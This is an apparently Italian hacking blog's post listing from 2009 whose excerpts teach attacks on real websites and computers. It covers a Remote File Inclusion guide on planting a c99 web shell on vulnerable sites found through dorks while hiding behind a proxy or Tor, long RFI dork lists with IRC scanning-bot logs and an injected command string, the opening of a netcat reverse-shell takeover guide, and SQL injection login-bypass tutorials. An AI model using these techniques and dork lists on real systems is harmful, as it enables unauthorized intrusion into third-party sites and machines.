Hacking - Duffabio - Hacking Blog

Guida alle RFI, (Remote File Inclusion)

Posted on 4/4/2009, 15:08 by: Duffabio

Guida RFI (Remote File Inclusion).
Guida di Duffabio.
Difficoltà: Bassa.

Piccola Parte Teorica
Una RFI è una tecnica in cui viene incluso un file (come si capisce dal nome) da remoto.

CODICE

index.com?pag=file.php

$var=$_GET['pag'];
include('$var');

Questo codice in PHP assegna il valore file.php alla variabile "var".

Come Usare La Shell
Noi possiamo usufruire di questo caso usando una Shell (io uso la c99).
Allora per usare la shell c99 (prenderemò in considerazione questa shell) dovete per prima cosa metterla su un vostro spazio web (Altervista) in formato .txt

Trovare I Siti Vulnerabili:
Fatto questo basta trovare con l'ausilio di QUESTE DORK un sito vulnerabile.
I siti vulnerabili dovrebbero essere di questo tipo:

CODICE

http://sitovulnerabile.php?page=story.php
http://sitobucato.com?x=tools.php

Impostare Una RFI
Trovato il sito vulnerabile alle RFI bisogna cancellare la parte dopo il segno "=" e inserire il link della nostra shell che andremmo a includere nella pagina vulnerabile.
Esempio:

CODICE

http://sitovulnerabile.com?page=[LINK DELLA TUA SHELL c99]
http://sitobucato.com?x=[LINK DELLA TUA SHELL c99]

Ricordatevi sempre di usare un Proxy oppure Tor in modo da coprire il vostro IP.

Edited by Duffabio - 25/8/2009, 11:59

Tags: Hacking

Comments: 0 | Views: 202

Last Post by: Duffabio (4/4/2009, 15:08)

Dork per RFI

Posted on 31/3/2009, 20:56 by: Duffabio

Molte Dork For RFI:

CODICE

/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
(www&#...

Read the entire post...

Tags: Hacking

Comments: 4 | Views: 62920

Last Post by: Duffabio (22/9/2009, 15:57)

Guida alla creazione di una Reverse Shell, Come sovvertire un pc remoto e prendere il controllo del prompt dei comandi

Posted on 25/3/2009, 17:32 by: Duffabio

Reverse Shell (o anche Connect-back Shell, Shell al contrario)

Guida di 4815162342. Livello di difficoltà: medio-alto. Guida un pò lunghetta, ma di sicuro ne vale la pena

Una reverse shell è un tipo di attacco che permette di ottenere il prompt dei comandi di un sistema remoto con diritti amministrativi.

A differenza di una "direct shell", non è chi attacca che si collega al pc-vittima. Sarà bensì il pc-vittima che si collegherà al pc di chi attacca, fornendogli il prompt dei comandi.

Questo consente di ovviare ai già discussi problemi di "pass-through", ossia riuscire a sorpassare firewall, router e quant'altro blocchi le connessioni in ingresso verso il pc-vittima.

Il tutorial che segue cercherà di spiegare come impostare una reverse shell per ottenere il controllo del prompt dei comandi di sistemi remoti basati su Windows.

Strumenti necessari:

NetCat (nc.exe, network utility che permette di agganciare programmi in riga di comando e redirezionare l'input e l'output da e verso un sistema remoto)
WinRar (software utility di compressione / decompressione archivi; utilissimo per creare i famigerati archivi autoestraenti)
Editor del Registro di sistema (reg.exe, software utility di editazione del registro di windows da riga di comando)
WebGet (wget.exe, network utility che permette di scaricare qualsiasi file via HTTP o FTP direttamente da riga di comando)

Prerogative:

Iscrizione ad un servizio di DNS dinamici (tipo DynDNS, No-IP, etc.)
Installazione di un client Updater di DNS dinamici sul proprio PC
Apertura di una porta TCP (liberamente scelta) sul firewall del proprio PC
Eventualmente (se ci si collega ad internet con un router), forward della porta TCP che è stata scelta, dal router al proprio PC Client.

- PARTE 1 - Preparazione del proprio PC

Si inizia con l'iscrizione al servizio di DNS dinamici. I DNS dinamici sono necessari per poter "ritrovare" il nostro pc in internet senza dover ogni volta andare a controllare il nostro IP pubblico (che cambia, di tanto in tanto, essendo un IP dinamico).

In questo esempio si userà il servizio fonito da DynDNS.org [http://www.dyndns.org].

CREAZIONE HOST DYNDNS

Recarsi sul sito http://www....

Read the entire post...

Tags: Hacking

Comments: 0 | Views: 131

Last Post by: Duffabio (25/3/2009, 17:32)

SQL Injection, Tutorial by Duffabio

Posted on 22/3/2009, 15:45 by: Duffabio

La SQL INJECTION, è un iniezione di codice in un database, tramite queste iniezioni è possibile ottenere i privilegi su un qualsiasi sito vulnerabile.

Proviamo a prendere un login qualsiasi, se nel campo ‘userid’ o ‘username' si inseriscono il valore "Admin" e nel campo ‘password’ il valore "passprova", la query SQL risulterà cosi:

CODICE

SELECT * FROM tabella_utenti
WHERE userid = 'Admin'
AND password = 'passprova'

Questa query è esatta ma non è perfetta, proviamo invece a inserire una stringa ben strutturata, ad esempio nel campo ‘password’ inseriamo:
1' or '1' = '1

Ed ecco come risulterà la query:

CODICE

SELECT * FROM tabella_utenti
WHERE userid = 'Admin'
AND password = '1' OR '1' = '1'

La query SQL grazie all’uso di OR imporrà ‘1' = ‘1' in modo da aver accesso al database dell’amministrazione senza dover immettere i veri dati di accesso visto che l’uguaglianza si è verificata esatta.

Questa piccola guida è già stata scritta milioni di volte, io ho provato a riscriverla in modo più semplificato possibile utilizzando le mie piccole conoscenze..

Duffabio

Tags: Hacking

Comments: 0 | Views: 147

Last Post by: Duffabio (22/3/2009, 15:45)

Dork

Posted on 13/2/2009, 17:53 by: Duffabio

Ecco moltissime Dork(le fonti sono citate prima dell'inserimento delle loro dork):

CODICE

index.php?src=
index.php?id=
index2.php?id=
index.php?cmd=
index2.php?page=
archive.php?file=
index.php?name=
index2.php?p=
index.php?subd=
index2.php?show=
index2.php?action=
index.php?lg=

———————————————
strings para RFI:
skins/advanced/advanced1.php?pluginpath[0]= allinurl:”index.php?categoryid=”

agenda.php3?rootagenda= allinurl:/phpmyagenda/
/modules/My_eGallery/public/displayCategory.php?basepath= inurl:My_eGallery
/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path= MODx CMS
/include/colorswitch.php?tsep_config[absPath]= “Powered By TSEP”
/esupport/admin/autoclose.php?subd= “Powered By Kayako eSupport”
adminprint.php?admin_folder= inurl:/PhotoCart/

!scan m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
!scan functions.php?include_path= “powered by: phpecard”
!scan actions/ipn.php?config[plugin_dir]= inurl:”index.php?page=” minibill
!scan store.php?site_isp_root= “powered by squirrelcart”
!scan classes/adodbt/sql.php?classes_dir= “Powered by Limbo CMS”
[17:11:55] <+fei> !v6 !eval @gstring=’inurl%3Aindex%2Ephp%3Fdo%3D%2A’;
[17:12:04] <+fei> !v6 @rfiscan 300 index.php?do=
!scan include/write.php?dir= inurl:zboard.php
!scan SQuery/lib/gore.php?libpath= inurl:”modules.php?name=SQuery”
[09:06:04] <@DEADLY> Vs[v6] !eval @gstring=’inurl%3A%22com_mgm%22′;
@rfiscan 100 string decodada
[09:06:20] <@DEADLY> Vs[v6] @rfiscan 100 administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:”com_webring”
!scan big.php?pathtotemplate= inurl:”big.php?”
!scan setup/upgrader.php?RootDirectory= inurl:”upgrader.php?”
!scan ashnews.php?pathtoashnews= inurl:”ashnews.php?”
!scan includes/search.php?GlobalSettings[templatesDirectory]= inurl:”search.php?”
!scan skin/zero_vote/setup.php?dir= “Copyright 1999 - 2006 Zeroboard”
!scan show.php?path= inurl:fclick
!scan index.php?page= inurl:”/index.p...

Read the entire post...

Tags: Hacking

Comments: 0 | Views: 215

Last Post by: Duffabio (13/2/2009, 17:53)

Tutorial SQL Injection

Posted on 9/2/2009, 22:26 by: Duffabio

<< Le dita dell'hacker scorrono veloci sulla tastiera, il form di autenticazione web non è un problema. Non conosce username e password, non gli servono: pochi secondi, tre battute sulla tastiera e il sistema è completamente nelle sue mani. "Good Morning, Administrator!", recita la nuova schermata. Non sono così sicuro che sarà una buona giornata per l'amministratore, pensa l'intruso fra sé. >>

Se pensate che una cosa simile possa accadere solo al cinema, vi ricrederete: questa scena viene girata ogni giorno decine, se non centinaia di volte, a causa di una delle tecniche di hacking del web più diffuse: la SQL injection. L'introduzione romanzata non esagera riguardo alla semplicità con cui un aggressore può oltrepassare i login messi a protezione delle nostre applicazioni web: è davvero questione di secondi.

Molti già conosceranno SQL (Structured Query Language), uno dei principali linguaggi usati per interagire con i database. Le pagine web dinamiche ASP e PHP (ma non solo) lo utilizzano con successo per memorizzare e manipolare le informazioni. L'insieme di dichiarazioni SQL inviate al database per ottenere una risposta si indica con il termine query (interrogazione). Le query possono modificare la struttura del database - ad esempio eliminando una tabella - oppure manipolarne il contenuto.

Un particolare dialetto utilizzato dal database Microsoft SQL Server è il Transact SQL. Per approfondire la conoscenza del linguaggio, uno dei più diffusi nelle pagine ASP (che sono maggiormente vulnerabili alla tecnica che stiamo per esporre), consultiamo il Corso T-SQL su Asp di HTML.it.

Ora possiamo capire con facilità a cosa si riferisce il nome dato alla tecnica: la SQL injection consiste nell'inserimento di query T-SQL e nella modifica di interrogazioni già esistenti nelle pagine dinamiche, così da far compiere all'applicazione un'azione del tutto imprevista.

Pensiamo all'esempio di un campo di autenticazione molto comune, come il login alla nostra webmail. Normalmente inseriamo username e password per poter leggere la posta elettronica. Lo script si collega al database, verifica le nostre autorizzazioni e ci consente l'accesso. Tutto questo tramite interrogazioni SQL. Ma cosa succede se un utente malizioso inserisce caratteri propri del linguaggio T-SQL (ad esempio l'apostrofo ', il doppio trattino --, il punto e virgola ? Con ogni probabilità, se la pagina ASP non prevede la validazione dell'input, l'aggressore può modificare la query a suo piacimento.

Naturalmente non basta una virgola per far cadere il sistema nelle mani dell'aggressore, ma è un buon punto di partenza. Modificando le query, come vedremo più avanti, è possibile avere accesso ad alcuni dati senza autorizzazione, eludere i sistemi di autenticazione e addirittura far eseguire veri e propri comandi al server web (ad esempio un listato delle directory, o una lettura d...

Read the entire post...

Tags: Hacking

Comments: 0 | Views: 66

Last Post by: Duffabio (9/2/2009, 22:26)